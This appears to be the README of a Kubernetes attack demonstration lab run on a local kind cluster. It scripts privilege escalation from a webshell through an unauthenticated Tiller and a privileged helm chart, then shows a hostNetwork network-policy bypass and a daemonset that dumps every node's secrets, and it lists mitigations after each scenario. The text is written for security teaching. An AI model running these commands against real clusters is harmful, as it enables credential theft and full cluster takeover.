See: installing Kind
kind version
should return with this version or later:
kind v0.6.1 go1.13.4 darwin/amd64
Use kind to create the customized cluster:
kind create cluster --config=kind/cluster.yaml --name=demo --image=docker.io/kindest/node:v1.16.3@sha256:70ce6ce09bee5c34ab14aec2b84d6edb260473a60638b1b095470a3a0f95ebec
Install Calico for NetworkPolicy
support:
kubectl apply -f kind/calico.yaml
Verifying the cluster is ready:
kubectl get pods -A
Should show:
NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system calico-kube-controllers-778676476b-c2g4p 1/1 Running 0 54s
kube-system calico-node-db4hq 1/1 Running 0 54s
kube-system calico-node-r6wfn 1/1 Running 0 54s
kube-system coredns-5644d7b6d9-579wk 1/1 Running 0 31m
kube-system coredns-5644d7b6d9-8mw2j 1/1 Running 0 31m
kube-system etcd-demo-control-plane 1/1 Running 0 30m
kube-system kube-apiserver-demo-control-plane 1/1 Running 0 30m
kube-system kube-controller-manager-demo-control-plane 1/1 Running 0 30m
kube-system kube-proxy-fwg7z 1/1 Running 0 31m
kube-system kube-proxy-knpph 1/1 Running 0 31m
kube-system kube-scheduler-demo-control-plane 1/1 Running 0 30m
This scenario demonstrates the potential for privilege escalation and lateral movement as a result of a pod compromise in a Kubernetes cluster with commonly-found configurations leading to full cluster access.
kubectl apply -f demo1/installation.yaml
- Create a local proxy to reach the "exposed"
dashboard
service:
kubectl port-forward service/dashboard 8080:8080
- Visit the
dashboard
by opening http://localhost:8080. - Navigate to /webshell and provide the basic auth credentials. Explain that arriving at this point is multi-faceted (backdoored software library, application vulnerability resulting in remote-code execution, etc).
- Now at a shell inside the
dashboard
pod, perform a few commands likeid
andhostname
andenv
to know we're in a Kubernetes cluster. - Download and run
kubectl
:
export PATH=/tmp:$PATH
cd /tmp; curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl; chmod +x kubectl
- Enumerate the
tiller
deployment running inkube-system
curl -v tiller-deploy.kube-system:44134
- Download the
helm
client binary and runhelm ls
.
cd /tmp; curl -so helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz; tar zxvf helm.tar.gz; chmod +x linux-amd64/helm; cp linux-amd64/helm .
helm version --host=tiller-deploy.kube-system:44134
export HELM_HOST=tiller-deploy.kube-system:44134; helm ls
helm install
a privileged/hostpath deployment via helm chart.
curl -sLO https://github.com/bgeesaman/nginx-test/archive/v1.0.0.tar.gz
helm install v1.0.0.tar.gz
- Find/access the webshell with
curl
and run commands in the privileged pod ascluster-admin
Get the newly created pod's service account token. The helm chart bound it to cluster-admin
during installation.
curl -XPOST -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token" nginx-test.default:8080
Run kubectl get secrets --all-namespaces
using the pod's mounted service account token as cluster-admin
:
curl -XPOST -d "cmd=kubectl get secrets -A" nginx-test.default:8080
Run kubectl get secrets --all-namespaces -o yaml
using the pod's mounted service account token as cluster-admin
:
curl -XPOST -d "cmd=kubectl get secrets -A -o yaml" nginx-test.default:8080
- Container vulnerability scanning
- Admission control disallowing vulnerable container images
- Admission control disallowing container images from non-trusted container registries
- Admission control disallowing privileged/hostpath pods
- Network policy preventing egress from the web pod
- Network policy prevening ingress to the tiller pod
- TLS Auth on Tiller or upgrade Tiller to v3
This scenario demonstrates the potential for privilege escalation and network policy bypass by a malicious insider or compromise of their credentials with the ability to create pods in a namespace leading to full cluster access.
Exit from the kubectl port-forward
if it's still running from demo1.
exit
kubectl apply -f demo1/installation.yaml # To ensure Tiller is installed
kubectl apply -f demo2/installation.yaml # RBAC and default ns network policy
- Show access to the
default
namespace but not tokube-system
to create pods.
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default
- Deploy a simple pod
kubectl --as [email protected] apply -f demo2/simplepod.yaml
- Get a shell in the pod:
kubectl --as [email protected] exec -it simplepod -- /bin/sh
- Attempt to reach
tiller
directly:
wget -qO - tiller-deploy.kube-system:44134
exit
- Deploy a hostnetwork pod that bypasses network egress policy on the namespace.
kubectl --as [email protected] apply -f demo2/hostnetwork.yaml
- Exec in, download the
helm
client binary and runhelm ls
to show that it can control Tiller.
kubectl --as [email protected] exec -it hostnetwork -- /bin/sh
export PATH=/tmp:$PATH; cd /tmp; wget -qO helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz; tar zxvf helm.tar.gz; chmod +x linux-amd64/helm; cp linux-amd64/helm .
export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134; helm ls
exit
- Show access to the
default
namespace but not tokube-system
to create pods.
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default
- Deploy the host path daemonset that reads all mounted secrets contents from all nodes into stdout
kubectl --as [email protected] apply -f demo2/daemonset.yaml
- Read the secrets in stdout.
kubectl --as [email protected] logs -f daemonset/secret-logger --all-containers=true --since=1m
- Container vulnerability scanning
- Admission control disallowing vulnerable container images
- Admission control disallowing container images from non-trusted container registries
- Admission control disallowing host network/privileged/hostpath pods
- Network policy prevening ingress to the tiller pod
- TLS Auth on Tiller or upgrade Tiller to v3
- Audit logging for all activities to find RBAC failures for uncommon commands.
kubectl delete -f demo1/installation.yaml
kubectl delete -f demo2/simplepod.yaml
kubectl delete -f demo2/hostnetwork.yaml
kubectl delete -f demo2/daemonset.yaml
kubectl delete -f demo2/installation.yaml
kind delete cluster --name=demo